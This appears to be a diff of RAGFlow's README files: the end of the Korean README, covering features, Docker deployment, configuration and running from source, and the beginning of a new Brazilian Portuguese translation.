<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||||
|
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||||
|
</a>
|
||||||
|
<a href="https://deepwiki.com/infiniflow/ragflow">
|
||||||
|
<img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
|
||||||
|
</a>
|
||||||
|
</p>
|
||||||
|
|
||||||
|
<h4 align="center">
|
||||||
|
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
|
||||||
|
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||||
|
<a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
|
||||||
|
<a href="https://demo.ragflow.io">Demo</a>
|
||||||
|
</h4>
|
||||||
|
|
||||||
|
#
|
||||||
|
|
||||||
|
## 💡 RAGFlow란?
|
||||||
|
|
||||||
|
[RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
|
||||||
|
|
||||||
|
## 🎮 데모
|
||||||
|
|
||||||
|
데모를 [https://demo.ragflow.io](https://demo.ragflow.io)에서 실행해 보세요.
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
|
||||||
|
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
## 🔥 업데이트
|
||||||
|
|
||||||
|
- 2025-08-01 에이전트 워크플로를 지원합니다.
|
||||||
|
- 2025-05-23 Agent에 Python/JS 코드 실행기 구성 요소를 추가합니다.
|
||||||
|
- 2025-05-05 언어 간 쿼리를 지원합니다.
|
||||||
|
- 2025-03-19 PDF 또는 DOCX 파일 내의 이미지를 이해하기 위해 다중 모드 모델을 사용하는 것을 지원합니다.
|
||||||
|
- 2025-02-28 인터넷 검색(TAVILY)과 결합되어 모든 LLM에 대한 심층 연구를 지원합니다.
|
||||||
|
- 2024-12-18 DeepDoc의 문서 레이아웃 분석 모델 업그레이드.
|
||||||
|
- 2024-08-22 RAG를 통해 SQL 문에 텍스트를 지원합니다.
|
||||||
|
|
||||||
|
## 🎉 계속 지켜봐 주세요
|
||||||
|
|
||||||
|
⭐️우리의 저장소를 즐겨찾기에 등록하여 흥미로운 새로운 기능과 업데이트를 최신 상태로 유지하세요! 모든 새로운 릴리스에 대한 즉시 알림을 받으세요! 🌟
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
## 🌟 주요 기능
|
||||||
|
|
||||||
|
### 🍭 **"Quality in, quality out"**
|
||||||
|
|
||||||
|
- [심층 문서 이해](./deepdoc/README.md)를 기반으로 복잡한 형식의 비정형 데이터에서 지식을 추출합니다.
|
||||||
|
- 문자 그대로 무한한 토큰에서 "데이터 속의 바늘"을 찾아냅니다.
|
||||||
|
|
||||||
|
### 🍱 **템플릿 기반의 chunking**
|
||||||
|
|
||||||
|
- 똑똑하고 설명 가능한 방식.
|
||||||
|
- 다양한 템플릿 옵션을 제공합니다.
|
||||||
|
|
||||||
|
### 🌱 **할루시네이션을 줄인 신뢰할 수 있는 인용**
|
||||||
|
|
||||||
|
- 텍스트 청킹을 시각화하여 사용자가 개입할 수 있도록 합니다.
|
||||||
|
- 중요한 참고 자료와 추적 가능한 인용을 빠르게 확인하여 신뢰할 수 있는 답변을 지원합니다.
|
||||||
|
|
||||||
|
### 🍔 **다른 종류의 데이터 소스와의 호환성**
|
||||||
|
|
||||||
|
- 워드, 슬라이드, 엑셀, 텍스트 파일, 이미지, 스캔본, 구조화된 데이터, 웹 페이지 등을 지원합니다.
|
||||||
|
|
||||||
|
### 🛀 **자동화되고 손쉬운 RAG 워크플로우**
|
||||||
|
|
||||||
|
- 개인 및 대규모 비즈니스에 맞춘 효율적인 RAG 오케스트레이션.
|
||||||
|
- 구성 가능한 LLM 및 임베딩 모델.
|
||||||
|
- 다중 검색과 결합된 re-ranking.
|
||||||
|
- 비즈니스와 원활하게 통합할 수 있는 직관적인 API.
|
||||||
|
|
||||||
|
## 🔎 시스템 아키텍처
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
## 🎬 시작하기
|
||||||
|
|
||||||
|
### 📝 사전 준비 사항
|
||||||
|
|
||||||
|
- CPU >= 4 cores
|
||||||
|
- RAM >= 16 GB
|
||||||
|
- Disk >= 50 GB
|
||||||
|
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||||
|
- [gVisor](https://gvisor.dev/docs/user_guide/install/): RAGFlow의 코드 실행기(샌드박스) 기능을 사용하려는 경우에만 필요합니다.
|
||||||
|
|
||||||
|
> [!TIP]
|
||||||
|
> 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치](https://docs.docker.com/engine/install/)를 참조하세요.
|
||||||
|
|
||||||
|
### 🚀 서버 시작하기
|
||||||
|
|
||||||
|
1. `vm.max_map_count`가 262144 이상인지 확인하세요:
|
||||||
|
|
||||||
|
> `vm.max_map_count`의 값을 아래 명령어를 통해 확인하세요:
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> $ sysctl vm.max_map_count
|
||||||
|
> ```
|
||||||
|
>
|
||||||
|
> 만약 `vm.max_map_count` 가 262144 보다 작다면 값을 재설정하세요.
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> # 이 경우에 262144로 설정했습니다.:
|
||||||
|
> $ sudo sysctl -w vm.max_map_count=262144
|
||||||
|
> ```
|
||||||
|
>
|
||||||
|
> 이 변경 사항은 시스템 재부팅 후에 초기화됩니다. 변경 사항을 영구적으로 적용하려면 **/etc/sysctl.conf** 파일에 `vm.max_map_count` 값을 추가하거나 업데이트하세요:
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> vm.max_map_count=262144
|
||||||
|
> ```
|
||||||
|
|
||||||
|
2. 레포지토리를 클론하세요:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
```
|
||||||
|
|
||||||
|
3. 미리 빌드된 Docker 이미지를 생성하고 서버를 시작하세요:
|
||||||
|
|
||||||
|
> [!CAUTION]
|
||||||
|
> 모든 Docker 이미지는 x86 플랫폼을 위해 빌드되었습니다. 우리는 현재 ARM64 플랫폼을 위한 Docker 이미지를 제공하지 않습니다.
|
||||||
|
> ARM64 플랫폼을 사용 중이라면, [시스템과 호환되는 Docker 이미지를 빌드하려면 이 가이드를 사용해 주세요](https://ragflow.io/docs/dev/build_docker_image).
|
||||||
|
|
||||||
|
> 아래 명령어는 RAGFlow Docker 이미지의 v0.20.0-slim 버전을 다운로드합니다. 다양한 RAGFlow 버전에 대한 설명은 다음 표를 참조하십시오. v0.20.0-slim과 다른 RAGFlow 버전을 다운로드하려면, docker/.env 파일에서 RAGFLOW_IMAGE 변수를 적절히 업데이트한 후 docker compose를 사용하여 서버를 시작하십시오. 예를 들어, 전체 버전인 v0.20.0을 다운로드하려면 RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0로 설정합니다.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ cd ragflow/docker
|
||||||
|
# Use CPU for embedding and DeepDoc tasks:
|
||||||
|
$ docker compose -f docker-compose.yml up -d
|
||||||
|
|
||||||
|
# To use GPU to accelerate embedding and DeepDoc tasks:
|
||||||
|
# docker compose -f docker-compose-gpu.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
|
||||||
|
| ----------------- | --------------- | --------------------- | ------------------------ |
|
||||||
|
| v0.20.0 | ≈9 | :heavy_check_mark: | Stable release |
|
||||||
|
| v0.20.0-slim | ≈2 | ❌ | Stable release |
|
||||||
|
| nightly | ≈9 | :heavy_check_mark: | _Unstable_ nightly build |
|
||||||
|
| nightly-slim | ≈2 | ❌ | _Unstable_ nightly build |
|
||||||
|
|
||||||
|
4. 서버가 시작된 후 서버 상태를 확인하세요:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ docker logs -f ragflow-server
|
||||||
|
```
|
||||||
|
|
||||||
|
_다음 출력 결과로 시스템이 성공적으로 시작되었음을 확인합니다:_
|
||||||
|
|
||||||
|
```bash
|
||||||
|
____ ___ ______ ______ __
|
||||||
|
/ __ \ / | / ____// ____// /____ _ __
|
||||||
|
/ /_/ // /| | / / __ / /_ / // __ \| | /| / /
|
||||||
|
/ _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
|
||||||
|
/_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
|
||||||
|
|
||||||
|
* Running on all addresses (0.0.0.0)
|
||||||
|
```
|
||||||
|
|
||||||
|
> 만약 확인 단계를 건너뛰고 바로 RAGFlow에 로그인하면, RAGFlow가 완전히 초기화되지 않았기 때문에 브라우저에서 `network anormal` 오류가 발생할 수 있습니다.
|
||||||
|
|
||||||
|
5. 웹 브라우저에 서버의 IP 주소를 입력하고 RAGFlow에 로그인하세요.
|
||||||
|
> 기본 설정을 사용할 경우, `http://IP_OF_YOUR_MACHINE`만 입력하면 됩니다 (포트 번호는 제외). 기본 HTTP 서비스 포트 `80`은 기본 구성으로 사용할 때 생략할 수 있습니다.
|
||||||
|
6. [service_conf.yaml.template](./docker/service_conf.yaml.template) 파일에서 원하는 LLM 팩토리를 `user_default_llm`에 선택하고, `API_KEY` 필드를 해당 API 키로 업데이트하세요.
|
||||||
|
|
||||||
|
> 자세한 내용은 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)를 참조하세요.
|
||||||
|
|
||||||
|
_이제 쇼가 시작됩니다!_
|
||||||
|
|
||||||
|
## 🔧 설정
|
||||||
|
|
||||||
|
시스템 설정과 관련하여 다음 파일들을 관리해야 합니다:
|
||||||
|
|
||||||
|
- [.env](./docker/.env): `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, `MINIO_PASSWORD`와 같은 시스템의 기본 설정을 포함합니다.
|
||||||
|
- [service_conf.yaml.template](./docker/service_conf.yaml.template): 백엔드 서비스를 구성합니다.
|
||||||
|
- [docker-compose.yml](./docker/docker-compose.yml): 시스템은 [docker-compose.yml](./docker/docker-compose.yml)을 사용하여 시작됩니다.
|
||||||
|
|
||||||
|
[.env](./docker/.env) 파일의 변경 사항이 [service_conf.yaml.template](./docker/service_conf.yaml.template) 파일의 내용과 일치하도록 해야 합니다.
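예를 들어 `MYSQL_PASSWORD` 를 변경했다면, 두 파일이 서로 대응하는지 다음과 같이 확인할 수 있습니다(한 가지 확인 예시입니다):

```bash
# docker/.env 에 정의한 값이 service_conf.yaml.template 의
# ${MYSQL_PASSWORD} 플레이스홀더와 대응하는지 확인
grep "MYSQL_PASSWORD" docker/.env
grep "MYSQL_PASSWORD" docker/service_conf.yaml.template
```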
|
||||||
|
|
||||||
|
> [./docker/README](./docker/README.md) 파일은 [service_conf.yaml.template](./docker/service_conf.yaml.template) 파일에서 `${ENV_VARS}`로 사용할 수 있는 환경 설정과 서비스 구성에 대한 자세한 설명을 제공합니다.
|
||||||
|
|
||||||
|
기본 HTTP 서비스 포트(80)를 업데이트하려면 [docker-compose.yml](./docker/docker-compose.yml) 파일에서 `80:80`을 `<YOUR_SERVING_PORT>:80`으로 변경하세요.
|
||||||
|
|
||||||
|
> 모든 시스템 구성 업데이트는 적용되기 위해 시스템 재부팅이 필요합니다.
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> $ docker compose -f docker-compose.yml up -d
|
||||||
|
> ```
|
||||||
|
|
||||||
|
### Elasticsearch 에서 Infinity 로 문서 엔진 전환
|
||||||
|
|
||||||
|
RAGFlow 는 기본적으로 Elasticsearch 를 사용하여 전체 텍스트 및 벡터를 저장합니다. [Infinity](https://github.com/infiniflow/infinity/) 로 전환하려면 다음 절차를 따르십시오.
|
||||||
|
|
||||||
|
1. 실행 중인 모든 컨테이너를 중지합니다.
|
||||||
|
```bash
|
||||||
|
$ docker compose -f docker/docker-compose.yml down -v
|
||||||
|
```
|
||||||
|
Note: `-v` 는 docker 컨테이너의 볼륨을 삭제하여 기존 데이터를 지웁니다.
|
||||||
|
2. **docker/.env**의 `DOC_ENGINE` 을 `infinity` 로 설정합니다.
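예를 들어 `sed` 로 다음과 같이 변경할 수 있습니다(**docker/.env** 의 실제 형식에 따라 조정이 필요할 수 있습니다):

```bash
# docker/.env 의 DOC_ENGINE 을 infinity 로 변경하는 예시
sed -i 's/^DOC_ENGINE=.*/DOC_ENGINE=infinity/' docker/.env
grep "^DOC_ENGINE" docker/.env   # DOC_ENGINE=infinity 로 표시되면 성공
```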
|
||||||
|
3. 컨테이너를 시작합니다:
|
||||||
|
```bash
|
||||||
|
$ docker compose -f docker/docker-compose.yml up -d
|
||||||
|
```
|
||||||
|
> [!WARNING]
|
||||||
|
> Linux/arm64 시스템에서 Infinity로 전환하는 것은 공식적으로 지원되지 않습니다.
|
||||||
|
|
||||||
|
## 🔧 소스 코드로 Docker 이미지를 컴파일합니다(임베딩 모델 포함하지 않음)
|
||||||
|
|
||||||
|
이 Docker 이미지의 크기는 약 2GB이며, 외부 대형 모델과 임베딩 서비스에 의존합니다.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
docker build --platform linux/amd64 --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
|
||||||
|
```
|
||||||
|
|
||||||
|
## 🔧 소스 코드로 Docker 이미지를 컴파일합니다(임베딩 모델 포함)
|
||||||
|
|
||||||
|
이 Docker의 크기는 약 9GB이며, 이미 임베딩 모델을 포함하고 있으므로 외부 대형 모델 서비스에만 의존하면 됩니다.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
docker build --platform linux/amd64 -f Dockerfile -t infiniflow/ragflow:nightly .
|
||||||
|
```
|
||||||
|
|
||||||
|
## 🔨 소스 코드로 서비스를 시작합니다.
|
||||||
|
|
||||||
|
1. uv를 설치하거나 이미 설치된 경우 이 단계를 건너뜁니다:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pipx install uv pre-commit
|
||||||
|
```
|
||||||
|
|
||||||
|
2. 소스 코드를 클론하고 Python 의존성을 설치합니다:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
|
||||||
|
uv run download_deps.py
|
||||||
|
pre-commit install
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Docker Compose를 사용하여 의존 서비스(MinIO, Elasticsearch, Redis 및 MySQL)를 시작합니다:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
docker compose -f docker/docker-compose-base.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
`/etc/hosts` 에 다음 줄을 추가하여 **conf/service_conf.yaml** 에 지정된 모든 호스트를 `127.0.0.1` 로 해결합니다:
|
||||||
|
|
||||||
|
```
|
||||||
|
127.0.0.1 es01 infinity mysql minio redis sandbox-executor-manager
|
||||||
|
```
|
||||||
|
|
||||||
|
4. HuggingFace에 접근할 수 없는 경우, `HF_ENDPOINT` 환경 변수를 설정하여 미러 사이트를 사용하세요:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
export HF_ENDPOINT=https://hf-mirror.com
|
||||||
|
```
|
||||||
|
|
||||||
|
5. 만약 운영 체제에 jemalloc이 없으면 다음 방식으로 설치하세요:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# ubuntu
|
||||||
|
sudo apt-get install libjemalloc-dev
|
||||||
|
# centos
|
||||||
|
sudo yum install jemalloc
|
||||||
|
```
|
||||||
|
|
||||||
|
6. 백엔드 서비스를 시작합니다:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
source .venv/bin/activate
|
||||||
|
export PYTHONPATH=$(pwd)
|
||||||
|
bash docker/launch_backend_service.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
7. 프론트엔드 의존성을 설치합니다:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cd web
|
||||||
|
npm install
|
||||||
|
```
|
||||||
|
|
||||||
|
8. 프론트엔드 서비스를 시작합니다:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
npm run dev
|
||||||
|
```
|
||||||
|
|
||||||
|
_다음 인터페이스는 시스템이 성공적으로 시작되었음을 나타냅니다:_
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
9. 개발이 완료된 후 RAGFlow 프론트엔드 및 백엔드 서비스를 중지합니다.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pkill -f "ragflow_server.py|task_executor.py"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## 📚 문서
|
||||||
|
|
||||||
|
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||||
|
- [Configuration](https://ragflow.io/docs/dev/configurations)
|
||||||
|
- [Release notes](https://ragflow.io/docs/dev/release_notes)
|
||||||
|
- [User guides](https://ragflow.io/docs/dev/category/guides)
|
||||||
|
- [Developer guides](https://ragflow.io/docs/dev/category/developers)
|
||||||
|
- [References](https://ragflow.io/docs/dev/category/references)
|
||||||
|
- [FAQs](https://ragflow.io/docs/dev/faq)
|
||||||
|
|
||||||
|
## 📜 로드맵
|
||||||
|
|
||||||
|
[RAGFlow 로드맵 2025](https://github.com/infiniflow/ragflow/issues/4214)을 확인하세요.
|
||||||
|
|
||||||
|
## 🏄 커뮤니티
|
||||||
|
|
||||||
|
- [Discord](https://discord.gg/NjYzJD3GM3)
|
||||||
|
- [Twitter](https://twitter.com/infiniflowai)
|
||||||
|
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||||
|
|
||||||
|
## 🙌 컨트리뷰션
|
||||||
|
|
||||||
|
RAGFlow는 오픈소스 협업을 통해 발전합니다. 이러한 정신을 바탕으로, 우리는 커뮤니티의 다양한 기여를 환영합니다. 참여하고 싶으시다면, 먼저 [가이드라인](https://ragflow.io/docs/dev/contributing)을 검토해 주세요.
|
||||||
README_pt_br.md (new file)
@@ -0,0 +1,388 @@
|
|||||||
|
<div align="center">
|
||||||
|
<a href="https://demo.ragflow.io/">
|
||||||
|
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
||||||
|
</a>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<p align="center">
|
||||||
|
<a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
|
||||||
|
<a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
|
||||||
|
<a href="./README_tzh.md"><img alt="繁體版中文自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
|
||||||
|
<a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
|
||||||
|
<a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
|
||||||
|
<a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
|
||||||
|
<a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DBEDFA"></a>
|
||||||
|
</p>
|
||||||
|
|
||||||
|
<p align="center">
|
||||||
|
<a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
|
||||||
|
<img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="seguir no X(Twitter)">
|
||||||
|
</a>
|
||||||
|
<a href="https://demo.ragflow.io" target="_blank">
|
||||||
|
<img alt="Badge Estático" src="https://img.shields.io/badge/Online-Demo-4e6b99">
|
||||||
|
</a>
|
||||||
|
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||||
|
<img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
|
||||||
|
</a>
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||||
|
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Última%20Relese" alt="Última Versão">
|
||||||
|
</a>
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||||
|
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="licença">
|
||||||
|
</a>
|
||||||
|
<a href="https://deepwiki.com/infiniflow/ragflow">
|
||||||
|
<img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
|
||||||
|
</a>
|
||||||
|
</p>
|
||||||
|
|
||||||
|
<h4 align="center">
|
||||||
|
<a href="https://ragflow.io/docs/dev/">Documentação</a> |
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
|
||||||
|
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||||
|
<a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
|
||||||
|
<a href="https://demo.ragflow.io">Demo</a>
|
||||||
|
</h4>
|
||||||
|
|
||||||
|
#
|
||||||
|
|
||||||
|
<details open>
|
||||||
|
<summary><b>📕 Índice</b></summary>
|
||||||
|
|
||||||
|
- 💡 [O que é o RAGFlow?](#-o-que-é-o-ragflow)
|
||||||
|
- 🎮 [Demo](#-demo)
|
||||||
|
- 📌 [Últimas Atualizações](#-últimas-atualizações)
|
||||||
|
- 🌟 [Principais Funcionalidades](#-principais-funcionalidades)
|
||||||
|
- 🔎 [Arquitetura do Sistema](#-arquitetura-do-sistema)
|
||||||
|
- 🎬 [Primeiros Passos](#-primeiros-passos)
|
||||||
|
- 🔧 [Configurações](#-configurações)
|
||||||
|
- 🔧 [Construir uma imagem docker sem incorporar modelos](#-construir-uma-imagem-docker-sem-incorporar-modelos)
|
||||||
|
- 🔧 [Construir uma imagem docker incluindo modelos](#-construir-uma-imagem-docker-incluindo-modelos)
|
||||||
|
- 🔨 [Lançar serviço a partir do código-fonte para desenvolvimento](#-lançar-serviço-a-partir-do-código-fonte-para-desenvolvimento)
|
||||||
|
- 📚 [Documentação](#-documentação)
|
||||||
|
- 📜 [Roadmap](#-roadmap)
|
||||||
|
- 🏄 [Comunidade](#-comunidade)
|
||||||
|
- 🙌 [Contribuindo](#-contribuindo)
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## 💡 O que é o RAGFlow?
|
||||||
|
|
||||||
|
[RAGFlow](https://ragflow.io/) é um mecanismo RAG (Geração Aumentada por Recuperação) de código aberto baseado em entendimento profundo de documentos. Ele oferece um fluxo de trabalho RAG simplificado para empresas de qualquer porte, combinando LLMs (Modelos de Linguagem de Grande Escala) para fornecer capacidades de perguntas e respostas verídicas, respaldadas por citações bem fundamentadas de diversos dados complexos formatados.
|
||||||
|
|
||||||
|
## 🎮 Demo
|
||||||
|
|
||||||
|
Experimente nossa demo em [https://demo.ragflow.io](https://demo.ragflow.io).
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
|
||||||
|
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
## 🔥 Últimas Atualizações
|
||||||
|
|
||||||
|
- 01-08-2025 Suporta o fluxo de trabalho agêntico.
|
||||||
|
- 23-05-2025 Adiciona o componente executor de código Python/JS ao Agente.
|
||||||
|
- 05-05-2025 Suporte a consultas entre idiomas.
|
||||||
|
- 19-03-2025 Suporta o uso de um modelo multi-modal para entender imagens dentro de arquivos PDF ou DOCX.
|
||||||
|
- 28-02-2025 Combinado com a pesquisa na Internet (Tavily), suporta pesquisas profundas para qualquer LLM.
|
||||||
|
- 18-12-2024 Atualiza o modelo de Análise de Layout de Documentos no DeepDoc.
|
||||||
|
- 22-08-2024 Suporta conversão de texto para comandos SQL via RAG.
|
||||||
|
|
||||||
|
## 🎉 Fique Ligado
|
||||||
|
|
||||||
|
⭐️ Dê uma estrela no nosso repositório para se manter atualizado com novas funcionalidades e melhorias empolgantes! Receba notificações instantâneas sobre novos lançamentos! 🌟
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
## 🌟 Principais Funcionalidades
|
||||||
|
|
||||||
|
### 🍭 **"Qualidade entra, qualidade sai"**
|
||||||
|
|
||||||
|
- Extração de conhecimento baseada em [entendimento profundo de documentos](./deepdoc/README.md) a partir de dados não estruturados com formatos complicados.
|
||||||
|
- Encontra a "agulha no palheiro de dados" de literalmente tokens ilimitados.
|
||||||
|
|
||||||
|
### 🍱 **Fragmentação baseada em templates**
|
||||||
|
|
||||||
|
- Inteligente e explicável.
|
||||||
|
- Muitas opções de templates para escolher.
|
||||||
|
|
||||||
|
### 🌱 **Citações fundamentadas com menos alucinações**
|
||||||
|
|
||||||
|
- Visualização da fragmentação de texto para permitir intervenção humana.
|
||||||
|
- Visualização rápida das referências chave e citações rastreáveis para apoiar respostas fundamentadas.
|
||||||
|
|
||||||
|
### 🍔 **Compatibilidade com fontes de dados heterogêneas**
|
||||||
|
|
||||||
|
- Suporta Word, apresentações, excel, txt, imagens, cópias digitalizadas, dados estruturados, páginas da web e mais.
|
||||||
|
|
||||||
|
### 🛀 **Fluxo de trabalho RAG automatizado e sem esforço**
|
||||||
|
|
||||||
|
- Orquestração RAG simplificada voltada tanto para negócios pessoais quanto grandes empresas.
|
||||||
|
- Modelos LLM e de incorporação configuráveis.
|
||||||
|
- Múltiplas recuperações emparelhadas com reclassificação fundida.
|
||||||
|
- APIs intuitivas para integração sem problemas com os negócios.
|
||||||
|
|
||||||
|
## 🔎 Arquitetura do Sistema
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
## 🎬 Primeiros Passos
|
||||||
|
|
||||||
|
### 📝 Pré-requisitos
|
||||||
|
|
||||||
|
- CPU >= 4 núcleos
|
||||||
|
- RAM >= 16 GB
|
||||||
|
- Disco >= 50 GB
|
||||||
|
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||||
|
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Necessário apenas se você pretende usar o recurso de executor de código (sandbox) do RAGFlow.
|
||||||
|
|
||||||
|
> [!TIP]
|
||||||
|
> Se você não instalou o Docker na sua máquina local (Windows, Mac ou Linux), veja [Instalar Docker Engine](https://docs.docker.com/engine/install/).
|
||||||
|
|
||||||
|
### 🚀 Iniciar o servidor
|
||||||
|
|
||||||
|
1. Certifique-se de que `vm.max_map_count` >= 262144:
|
||||||
|
|
||||||
|
> Para verificar o valor de `vm.max_map_count`:
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> $ sysctl vm.max_map_count
|
||||||
|
> ```
|
||||||
|
>
|
||||||
|
> Se necessário, redefina `vm.max_map_count` para um valor de pelo menos 262144:
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> # Neste caso, defina para 262144:
|
||||||
|
> $ sudo sysctl -w vm.max_map_count=262144
|
||||||
|
> ```
|
||||||
|
>
|
||||||
|
> Essa mudança será resetada após a reinicialização do sistema. Para garantir que a alteração permaneça permanente, adicione ou atualize o valor de `vm.max_map_count` em **/etc/sysctl.conf**:
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> vm.max_map_count=262144
|
||||||
|
> ```
|
||||||
|
|
||||||
|
2. Clone o repositório:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Inicie o servidor usando as imagens Docker pré-compiladas:
|
||||||
|
|
||||||
|
> [!CAUTION]
|
||||||
|
> Todas as imagens Docker são construídas para plataformas x86. Atualmente, não oferecemos imagens Docker para ARM64.
|
||||||
|
> Se você estiver usando uma plataforma ARM64, por favor, utilize [este guia](https://ragflow.io/docs/dev/build_docker_image) para construir uma imagem Docker compatível com o seu sistema.
|
||||||
|
|
||||||
|
